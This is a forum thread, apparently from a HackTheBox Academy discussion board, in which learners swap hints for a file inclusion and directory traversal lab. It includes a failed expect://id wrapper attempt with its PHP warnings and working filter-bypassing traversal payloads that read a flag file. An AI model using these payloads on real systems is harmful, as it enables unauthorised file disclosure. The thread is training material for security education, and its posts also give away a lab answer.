Any one working on HTB Academy FILE INCLUSION / DIRECTORY TRAVERSAL?

crypteddata04 · March 28, 2021, 6:28am

anyone working on this module? im stuck in the second question about

“Submit the contents of the flag.txt file located in the /usr/share/flags directory.”

i tried using different methods like PHP Wrapper and Extension Bypass Using Null Byte, still not working getting an error msg

Warning: include(): Unable to find the wrapper “expect” - did you forget to enable it when you configured PHP? in /var/www/html/wrappers/index.php on line 47

Warning: include(expect://id): failed to open stream: No such file or directory in /var/www/html/wrappers/index.php on line 47

Warning: include(): Failed opening ‘expect://id’ for inclusion (include_path=‘.:/usr/share/php’) in /var/www/html/wrappers/index.php on line 47
Notice: Undefined variable: p2 in /var/www

matongder · March 30, 2021, 7:40am

Hello, that’s OK
?language=…//…//…//…//usr/share/flags/flag.txt

crypteddata04 · March 30, 2021, 10:10am

Type your comment> @matongder said:

Hello, that’s OK
?language=…//…//…//…//usr/share/flags/flag.txt

thanks bro!

juvline · April 23, 2023, 1:52pm

I can’t use this payload to get flag,
http://64.227.37.196:32729/index.php?language
this is my url

juvline · April 23, 2023, 1:57pm

i get it:use language=/…/…/…/…/usr/share/flag.txt
thanks